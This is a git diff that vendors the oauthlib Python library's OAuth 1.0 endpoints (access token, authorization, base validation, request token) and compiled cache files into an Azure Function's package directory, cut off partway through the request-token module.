signatures may only be used with form-urlencoded content') + + # We amend https://tools.ietf.org/html/rfc5849#section-3.4.1.3.1 + # with the clause that parameters from body should only be included + # in non GET or HEAD requests. Extracting the request body parameters + # and including them in the signature base string would give semantic + # meaning to the body, which it should not have according to the + # HTTP 1.1 spec. + elif http_method.upper() in ('GET', 'HEAD') and has_params: + raise ValueError('GET/HEAD requests should not include body.') + + # generate the basic OAuth parameters + request.oauth_params = self.get_oauth_params(request) + + # generate the signature + request.oauth_params.append( + ('oauth_signature', self.get_oauth_signature(request))) + + # render the signed request and return it + uri, headers, body = self._render(request, formencode=True, + realm=(realm or self.realm)) + + if self.decoding: + log.debug('Encoding URI, headers and body to %s.', self.decoding) + uri = uri.encode(self.decoding) + body = body.encode(self.decoding) if body else body + new_headers = {} + for k, v in headers.items(): + new_headers[k.encode(self.decoding)] = v.encode(self.decoding) + headers = new_headers + return uri, headers, body diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..743da0e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/errors.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/errors.cpython-39.pyc new file mode 100644 index 0000000..a36ea9f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/errors.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/parameters.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/parameters.cpython-39.pyc new file mode 100644 index 0000000..8ea37f6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/parameters.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/request_validator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/request_validator.cpython-39.pyc new file mode 100644 index 0000000..e11c686 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/request_validator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/signature.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/signature.cpython-39.pyc new file mode 100644 index 0000000..b58cdc7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/signature.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..dd8df03 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__init__.py new file mode 100644 index 0000000..e2f6a06 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__init__.py @@ -0,0 +1,8 @@ +from .access_token import AccessTokenEndpoint +from .authorization import AuthorizationEndpoint +from .base import BaseEndpoint +from .request_token import RequestTokenEndpoint +from .resource import ResourceEndpoint +from .signature_only import SignatureOnlyEndpoint + +from .pre_configured import WebApplicationServer # isort:skip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..513f11c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/access_token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/access_token.cpython-39.pyc new file mode 100644 index 0000000..dff163d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/access_token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/authorization.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/authorization.cpython-39.pyc new file mode 100644 index 0000000..c885779 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/authorization.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..cddb577 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/pre_configured.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/pre_configured.cpython-39.pyc new file mode 100644 index 0000000..a7ec759 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/pre_configured.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/request_token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/request_token.cpython-39.pyc new file mode 100644 index 0000000..c508b4d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/request_token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/resource.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/resource.cpython-39.pyc new file mode 100644 index 0000000..c01be65 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/resource.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/signature_only.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/signature_only.cpython-39.pyc new file mode 100644 index 0000000..9e2b47b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/__pycache__/signature_only.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/access_token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/access_token.py new file mode 100644 index 0000000..db369b0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/access_token.py @@ -0,0 +1,215 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth1.rfc5849.endpoints.access_token +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of the access token provider logic of +OAuth 1.0 RFC 5849. It validates the correctness of access token requests, +creates and persists tokens as well as create the proper response to be +returned to the client. +""" +import logging + +from oauthlib.common import urlencode + +from .. import errors +from .base import BaseEndpoint + +log = logging.getLogger(__name__) + + +class AccessTokenEndpoint(BaseEndpoint): + + """An endpoint responsible for providing OAuth 1 access tokens. + + Typical use is to instantiate with a request validator and invoke the + ``create_access_token_response`` from a view function. The tuple returned + has all information necessary (body, status, headers) to quickly form + and return a proper response. See :doc:`/oauth1/validator` for details on which + validator methods to implement for this endpoint. + """ + + def create_access_token(self, request, credentials): + """Create and save a new access token. + + Similar to OAuth 2, indication of granted scopes will be included as a + space separated list in ``oauth_authorized_realms``. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: The token as an urlencoded string. + """ + request.realms = self.request_validator.get_realms( + request.resource_owner_key, request) + token = { + 'oauth_token': self.token_generator(), + 'oauth_token_secret': self.token_generator(), + # Backport the authorized scopes indication used in OAuth2 + 'oauth_authorized_realms': ' '.join(request.realms) + } + token.update(credentials) + self.request_validator.save_access_token(token, request) + return urlencode(token.items()) + + def create_access_token_response(self, uri, http_method='GET', body=None, + headers=None, credentials=None): + """Create an access token response, with a new request token if valid. + + :param uri: The full URI of the token request. + :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc. + :param body: The request body as a string. + :param headers: The request headers as a dict. + :param credentials: A list of extra credentials to include in the token. + :returns: A tuple of 3 elements. + 1. A dict of headers to set on the response. + 2. The response body as a string. + 3. The response status code as an integer. + + An example of a valid request:: + + >>> from your_validator import your_validator + >>> from oauthlib.oauth1 import AccessTokenEndpoint + >>> endpoint = AccessTokenEndpoint(your_validator) + >>> h, b, s = endpoint.create_access_token_response( + ... 'https://your.provider/access_token?foo=bar', + ... headers={ + ... 'Authorization': 'OAuth oauth_token=234lsdkf....' + ... }, + ... credentials={ + ... 'my_specific': 'argument', + ... }) + >>> h + {'Content-Type': 'application/x-www-form-urlencoded'} + >>> b + 'oauth_token=lsdkfol23w54jlksdef&oauth_token_secret=qwe089234lkjsdf&oauth_authorized_realms=movies+pics&my_specific=argument' + >>> s + 200 + + An response to invalid request would have a different body and status:: + + >>> b + 'error=invalid_request&description=missing+resource+owner+key' + >>> s + 400 + + The same goes for an an unauthorized request: + + >>> b + '' + >>> s + 401 + """ + resp_headers = {'Content-Type': 'application/x-www-form-urlencoded'} + try: + request = self._create_request(uri, http_method, body, headers) + valid, processed_request = self.validate_access_token_request( + request) + if valid: + token = self.create_access_token(request, credentials or {}) + self.request_validator.invalidate_request_token( + request.client_key, + request.resource_owner_key, + request) + return resp_headers, token, 200 + else: + return {}, None, 401 + except errors.OAuth1Error as e: + return resp_headers, e.urlencoded, e.status_code + + def validate_access_token_request(self, request): + """Validate an access token request. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :raises: OAuth1Error if the request is invalid. + :returns: A tuple of 2 elements. + 1. The validation result (True or False). + 2. The request object. + """ + self._check_transport_security(request) + self._check_mandatory_parameters(request) + + if not request.resource_owner_key: + raise errors.InvalidRequestError( + description='Missing resource owner.') + + if not self.request_validator.check_request_token( + request.resource_owner_key): + raise errors.InvalidRequestError( + description='Invalid resource owner key format.') + + if not request.verifier: + raise errors.InvalidRequestError( + description='Missing verifier.') + + if not self.request_validator.check_verifier(request.verifier): + raise errors.InvalidRequestError( + description='Invalid verifier format.') + + if not self.request_validator.validate_timestamp_and_nonce( + request.client_key, request.timestamp, request.nonce, request, + request_token=request.resource_owner_key): + return False, request + + # The server SHOULD return a 401 (Unauthorized) status code when + # receiving a request with invalid client credentials. + # Note: This is postponed in order to avoid timing attacks, instead + # a dummy client is assigned and used to maintain near constant + # time request verification. + # + # Note that early exit would enable client enumeration + valid_client = self.request_validator.validate_client_key( + request.client_key, request) + if not valid_client: + request.client_key = self.request_validator.dummy_client + + # The server SHOULD return a 401 (Unauthorized) status code when + # receiving a request with invalid or expired token. + # Note: This is postponed in order to avoid timing attacks, instead + # a dummy token is assigned and used to maintain near constant + # time request verification. + # + # Note that early exit would enable resource owner enumeration + valid_resource_owner = self.request_validator.validate_request_token( + request.client_key, request.resource_owner_key, request) + if not valid_resource_owner: + request.resource_owner_key = self.request_validator.dummy_request_token + + # The server MUST verify (Section 3.2) the validity of the request, + # ensure that the resource owner has authorized the provisioning of + # token credentials to the client, and ensure that the temporary + # credentials have not expired or been used before. The server MUST + # also verify the verification code received from the client. + # .. _`Section 3.2`: https://tools.ietf.org/html/rfc5849#section-3.2 + # + # Note that early exit would enable resource owner authorization + # verifier enumertion. + valid_verifier = self.request_validator.validate_verifier( + request.client_key, + request.resource_owner_key, + request.verifier, + request) + + valid_signature = self._check_signature(request, is_token_request=True) + + # log the results to the validator_log + # this lets us handle internal reporting and analysis + request.validator_log['client'] = valid_client + request.validator_log['resource_owner'] = valid_resource_owner + request.validator_log['verifier'] = valid_verifier + request.validator_log['signature'] = valid_signature + + # We delay checking validity until the very end, using dummy values for + # calculations and fetching secrets/keys to ensure the flow of every + # request remains almost identical regardless of whether valid values + # have been supplied. This ensures near constant time execution and + # prevents malicious users from guessing sensitive information + v = all((valid_client, valid_resource_owner, valid_verifier, + valid_signature)) + if not v: + log.info("[Failure] request verification failed.") + log.info("Valid client:, %s", valid_client) + log.info("Valid token:, %s", valid_resource_owner) + log.info("Valid verifier:, %s", valid_verifier) + log.info("Valid signature:, %s", valid_signature) + return v, request diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/authorization.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/authorization.py new file mode 100644 index 0000000..6d8fb07 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/authorization.py @@ -0,0 +1,158 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth1.rfc5849.endpoints.authorization +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for signing and checking OAuth 1.0 RFC 5849 requests. +""" +from urllib.parse import urlencode + +from oauthlib.common import add_params_to_uri + +from .. import errors +from .base import BaseEndpoint + + +class AuthorizationEndpoint(BaseEndpoint): + + """An endpoint responsible for letting authenticated users authorize access + to their protected resources to a client. + + Typical use would be to have two views, one for displaying the authorization + form and one to process said form on submission. + + The first view will want to utilize ``get_realms_and_credentials`` to fetch + requested realms and useful client credentials, such as name and + description, to be used when creating the authorization form. + + During form processing you can use ``create_authorization_response`` to + validate the request, create a verifier as well as prepare the final + redirection URI used to send the user back to the client. + + See :doc:`/oauth1/validator` for details on which validator methods to implement + for this endpoint. + """ + + def create_verifier(self, request, credentials): + """Create and save a new request token. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param credentials: A dict of extra token credentials. + :returns: The verifier as a dict. + """ + verifier = { + 'oauth_token': request.resource_owner_key, + 'oauth_verifier': self.token_generator(), + } + verifier.update(credentials) + self.request_validator.save_verifier( + request.resource_owner_key, verifier, request) + return verifier + + def create_authorization_response(self, uri, http_method='GET', body=None, + headers=None, realms=None, credentials=None): + """Create an authorization response, with a new request token if valid. + + :param uri: The full URI of the token request. + :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc. + :param body: The request body as a string. + :param headers: The request headers as a dict. + :param credentials: A list of credentials to include in the verifier. + :returns: A tuple of 3 elements. + 1. A dict of headers to set on the response. + 2. The response body as a string. + 3. The response status code as an integer. + + If the callback URI tied to the current token is "oob", a response with + a 200 status code will be returned. In this case, it may be desirable to + modify the response to better display the verifier to the client. + + An example of an authorization request:: + + >>> from your_validator import your_validator + >>> from oauthlib.oauth1 import AuthorizationEndpoint + >>> endpoint = AuthorizationEndpoint(your_validator) + >>> h, b, s = endpoint.create_authorization_response( + ... 'https://your.provider/authorize?oauth_token=...', + ... credentials={ + ... 'extra': 'argument', + ... }) + >>> h + {'Location': 'https://the.client/callback?oauth_verifier=...&extra=argument'} + >>> b + None + >>> s + 302 + + An example of a request with an "oob" callback:: + + >>> from your_validator import your_validator + >>> from oauthlib.oauth1 import AuthorizationEndpoint + >>> endpoint = AuthorizationEndpoint(your_validator) + >>> h, b, s = endpoint.create_authorization_response( + ... 'https://your.provider/authorize?foo=bar', + ... credentials={ + ... 'extra': 'argument', + ... }) + >>> h + {'Content-Type': 'application/x-www-form-urlencoded'} + >>> b + 'oauth_verifier=...&extra=argument' + >>> s + 200 + """ + request = self._create_request(uri, http_method=http_method, body=body, + headers=headers) + + if not request.resource_owner_key: + raise errors.InvalidRequestError( + 'Missing mandatory parameter oauth_token.') + if not self.request_validator.verify_request_token( + request.resource_owner_key, request): + raise errors.InvalidClientError() + + request.realms = realms + if (request.realms and not self.request_validator.verify_realms( + request.resource_owner_key, request.realms, request)): + raise errors.InvalidRequestError( + description=('User granted access to realms outside of ' + 'what the client may request.')) + + verifier = self.create_verifier(request, credentials or {}) + redirect_uri = self.request_validator.get_redirect_uri( + request.resource_owner_key, request) + if redirect_uri == 'oob': + response_headers = { + 'Content-Type': 'application/x-www-form-urlencoded'} + response_body = urlencode(verifier) + return response_headers, response_body, 200 + else: + populated_redirect = add_params_to_uri( + redirect_uri, verifier.items()) + return {'Location': populated_redirect}, None, 302 + + def get_realms_and_credentials(self, uri, http_method='GET', body=None, + headers=None): + """Fetch realms and credentials for the presented request token. + + :param uri: The full URI of the token request. + :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc. + :param body: The request body as a string. + :param headers: The request headers as a dict. + :returns: A tuple of 2 elements. + 1. A list of request realms. + 2. A dict of credentials which may be useful in creating the + authorization form. + """ + request = self._create_request(uri, http_method=http_method, body=body, + headers=headers) + + if not self.request_validator.verify_request_token( + request.resource_owner_key, request): + raise errors.InvalidClientError() + + realms = self.request_validator.get_realms( + request.resource_owner_key, request) + return realms, {'resource_owner_key': request.resource_owner_key} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/base.py new file mode 100644 index 0000000..c5e9449 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/base.py @@ -0,0 +1,245 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth1.rfc5849.endpoints.base +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for signing and checking OAuth 1.0 RFC 5849 requests. +""" +import time + +from oauthlib.common import CaseInsensitiveDict, Request, generate_token + +from .. import ( + CONTENT_TYPE_FORM_URLENCODED, + SIGNATURE_HMAC_SHA1, SIGNATURE_HMAC_SHA256, SIGNATURE_HMAC_SHA512, + SIGNATURE_RSA_SHA1, SIGNATURE_RSA_SHA256, SIGNATURE_RSA_SHA512, + SIGNATURE_PLAINTEXT, + SIGNATURE_TYPE_AUTH_HEADER, SIGNATURE_TYPE_BODY, + SIGNATURE_TYPE_QUERY, errors, signature, utils) + + +class BaseEndpoint: + + def __init__(self, request_validator, token_generator=None): + self.request_validator = request_validator + self.token_generator = token_generator or generate_token + + def _get_signature_type_and_params(self, request): + """Extracts parameters from query, headers and body. Signature type + is set to the source in which parameters were found. + """ + # Per RFC5849, only the Authorization header may contain the 'realm' + # optional parameter. + header_params = signature.collect_parameters(headers=request.headers, + exclude_oauth_signature=False, with_realm=True) + body_params = signature.collect_parameters(body=request.body, + exclude_oauth_signature=False) + query_params = signature.collect_parameters(uri_query=request.uri_query, + exclude_oauth_signature=False) + + params = [] + params.extend(header_params) + params.extend(body_params) + params.extend(query_params) + signature_types_with_oauth_params = list(filter(lambda s: s[2], ( + (SIGNATURE_TYPE_AUTH_HEADER, params, + utils.filter_oauth_params(header_params)), + (SIGNATURE_TYPE_BODY, params, + utils.filter_oauth_params(body_params)), + (SIGNATURE_TYPE_QUERY, params, + utils.filter_oauth_params(query_params)) + ))) + + if len(signature_types_with_oauth_params) > 1: + found_types = [s[0] for s in signature_types_with_oauth_params] + raise errors.InvalidRequestError( + description=('oauth_ params must come from only 1 signature' + 'type but were found in %s', + ', '.join(found_types))) + + try: + signature_type, params, oauth_params = signature_types_with_oauth_params[ + 0] + except IndexError: + raise errors.InvalidRequestError( + description='Missing mandatory OAuth parameters.') + + return signature_type, params, oauth_params + + def _create_request(self, uri, http_method, body, headers): + # Only include body data from x-www-form-urlencoded requests + headers = CaseInsensitiveDict(headers or {}) + if ("Content-Type" in headers and + CONTENT_TYPE_FORM_URLENCODED in headers["Content-Type"]): + request = Request(uri, http_method, body, headers) + else: + request = Request(uri, http_method, '', headers) + + signature_type, params, oauth_params = ( + self._get_signature_type_and_params(request)) + + # The server SHOULD return a 400 (Bad Request) status code when + # receiving a request with duplicated protocol parameters. + if len(dict(oauth_params)) != len(oauth_params): + raise errors.InvalidRequestError( + description='Duplicate OAuth1 entries.') + + oauth_params = dict(oauth_params) + request.signature = oauth_params.get('oauth_signature') + request.client_key = oauth_params.get('oauth_consumer_key') + request.resource_owner_key = oauth_params.get('oauth_token') + request.nonce = oauth_params.get('oauth_nonce') + request.timestamp = oauth_params.get('oauth_timestamp') + request.redirect_uri = oauth_params.get('oauth_callback') + request.verifier = oauth_params.get('oauth_verifier') + request.signature_method = oauth_params.get('oauth_signature_method') + request.realm = dict(params).get('realm') + request.oauth_params = oauth_params + + # Parameters to Client depend on signature method which may vary + # for each request. Note that HMAC-SHA1 and PLAINTEXT share parameters + request.params = [(k, v) for k, v in params if k != "oauth_signature"] + + if 'realm' in request.headers.get('Authorization', ''): + request.params = [(k, v) + for k, v in request.params if k != "realm"] + + return request + + def _check_transport_security(self, request): + # TODO: move into oauthlib.common from oauth2.utils + if (self.request_validator.enforce_ssl and + not request.uri.lower().startswith("https://")): + raise errors.InsecureTransportError() + + def _check_mandatory_parameters(self, request): + # The server SHOULD return a 400 (Bad Request) status code when + # receiving a request with missing parameters. + if not all((request.signature, request.client_key, + request.nonce, request.timestamp, + request.signature_method)): + raise errors.InvalidRequestError( + description='Missing mandatory OAuth parameters.') + + # OAuth does not mandate a particular signature method, as each + # implementation can have its own unique requirements. Servers are + # free to implement and document their own custom methods. + # Recommending any particular method is beyond the scope of this + # specification. Implementers should review the Security + # Considerations section (`Section 4`_) before deciding on which + # method to support. + # .. _`Section 4`: https://tools.ietf.org/html/rfc5849#section-4 + if (not request.signature_method in + self.request_validator.allowed_signature_methods): + raise errors.InvalidSignatureMethodError( + description="Invalid signature, {} not in {!r}.".format( + request.signature_method, + self.request_validator.allowed_signature_methods)) + + # Servers receiving an authenticated request MUST validate it by: + # If the "oauth_version" parameter is present, ensuring its value is + # "1.0". + if ('oauth_version' in request.oauth_params and + request.oauth_params['oauth_version'] != '1.0'): + raise errors.InvalidRequestError( + description='Invalid OAuth version.') + + # The timestamp value MUST be a positive integer. Unless otherwise + # specified by the server's documentation, the timestamp is expressed + # in the number of seconds since January 1, 1970 00:00:00 GMT. + if len(request.timestamp) != 10: + raise errors.InvalidRequestError( + description='Invalid timestamp size') + + try: + ts = int(request.timestamp) + + except ValueError: + raise errors.InvalidRequestError( + description='Timestamp must be an integer.') + + else: + # To avoid the need to retain an infinite number of nonce values for + # future checks, servers MAY choose to restrict the time period after + # which a request with an old timestamp is rejected. + if abs(time.time() - ts) > self.request_validator.timestamp_lifetime: + raise errors.InvalidRequestError( + description=('Timestamp given is invalid, differ from ' + 'allowed by over %s seconds.' % ( + self.request_validator.timestamp_lifetime))) + + # Provider specific validation of parameters, used to enforce + # restrictions such as character set and length. + if not self.request_validator.check_client_key(request.client_key): + raise errors.InvalidRequestError( + description='Invalid client key format.') + + if not self.request_validator.check_nonce(request.nonce): + raise errors.InvalidRequestError( + description='Invalid nonce format.') + + def _check_signature(self, request, is_token_request=False): + # ---- RSA Signature verification ---- + if request.signature_method == SIGNATURE_RSA_SHA1 or \ + request.signature_method == SIGNATURE_RSA_SHA256 or \ + request.signature_method == SIGNATURE_RSA_SHA512: + # RSA-based signature method + + # The server verifies the signature per `[RFC3447] section 8.2.2`_ + # .. _`[RFC3447] section 8.2.2`: https://tools.ietf.org/html/rfc3447#section-8.2.1 + + rsa_key = self.request_validator.get_rsa_key( + request.client_key, request) + + if request.signature_method == SIGNATURE_RSA_SHA1: + valid_signature = signature.verify_rsa_sha1(request, rsa_key) + elif request.signature_method == SIGNATURE_RSA_SHA256: + valid_signature = signature.verify_rsa_sha256(request, rsa_key) + elif request.signature_method == SIGNATURE_RSA_SHA512: + valid_signature = signature.verify_rsa_sha512(request, rsa_key) + else: + valid_signature = False + + # ---- HMAC or Plaintext Signature verification ---- + else: + # Non-RSA based signature method + + # Servers receiving an authenticated request MUST validate it by: + # Recalculating the request signature independently as described in + # `Section 3.4`_ and comparing it to the value received from the + # client via the "oauth_signature" parameter. + # .. _`Section 3.4`: https://tools.ietf.org/html/rfc5849#section-3.4 + + client_secret = self.request_validator.get_client_secret( + request.client_key, request) + + resource_owner_secret = None + if request.resource_owner_key: + if is_token_request: + resource_owner_secret = \ + self.request_validator.get_request_token_secret( + request.client_key, request.resource_owner_key, + request) + else: + resource_owner_secret = \ + self.request_validator.get_access_token_secret( + request.client_key, request.resource_owner_key, + request) + + if request.signature_method == SIGNATURE_HMAC_SHA1: + valid_signature = signature.verify_hmac_sha1( + request, client_secret, resource_owner_secret) + elif request.signature_method == SIGNATURE_HMAC_SHA256: + valid_signature = signature.verify_hmac_sha256( + request, client_secret, resource_owner_secret) + elif request.signature_method == SIGNATURE_HMAC_SHA512: + valid_signature = signature.verify_hmac_sha512( + request, client_secret, resource_owner_secret) + elif request.signature_method == SIGNATURE_PLAINTEXT: + valid_signature = signature.verify_plaintext( + request, client_secret, resource_owner_secret) + else: + valid_signature = False + + return valid_signature diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/pre_configured.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/pre_configured.py new file mode 100644 index 0000000..7409468 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/pre_configured.py @@ -0,0 +1,14 @@ +from . import ( + AccessTokenEndpoint, AuthorizationEndpoint, RequestTokenEndpoint, + ResourceEndpoint, +) + + +class WebApplicationServer(RequestTokenEndpoint, AuthorizationEndpoint, + AccessTokenEndpoint, ResourceEndpoint): + + def __init__(self, request_validator): + RequestTokenEndpoint.__init__(self, request_validator) + AuthorizationEndpoint.__init__(self, request_validator) + AccessTokenEndpoint.__init__(self, request_validator) + ResourceEndpoint.__init__(self, request_validator) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/request_token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/request_token.py new file mode 100644 index 0000000..2502798 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/request_token.py @@ -0,0 +1,209 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth1.rfc5849.endpoints.request_token +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of the request token provider logic of +OAuth 1.0 RFC 5849. It validates the correctness of request token requests, +creates and persists tokens as well as create the proper response to be +returned to the client. +""" +import logging + +from oauthlib.common import urlencode + +from .. import errors +from .base import BaseEndpoint + +log = logging.getLogger(__name__) + + +class RequestTokenEndpoint(BaseEndpoint): + + """An endpoint responsible for providing OAuth 1 request tokens. + + Typical use is to instantiate with a request validator and invoke the + ``create_request_token_response`` from a view function. The tuple returned + has all information necessary (body, status, headers) to quickly form + and return a proper response. See :doc:`/oauth1/validator` for details on which + validator methods to implement for this endpoint. + """ + + def create_request_token(self, request, credentials): + """Create and save a new request token. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param credentials: A dict of extra token credentials. + :returns: The token as an urlencoded string. + """ + token = { + 'oauth_token': self.token_generator(), + 'oauth_token_secret': self.token_generator(), + 'oauth_callback_confirmed': 'true' + } + token.update(credentials) + self.request_validator.save_request_token(token, request) + return urlencode(token.items()) + + def create_request_token_response(self, 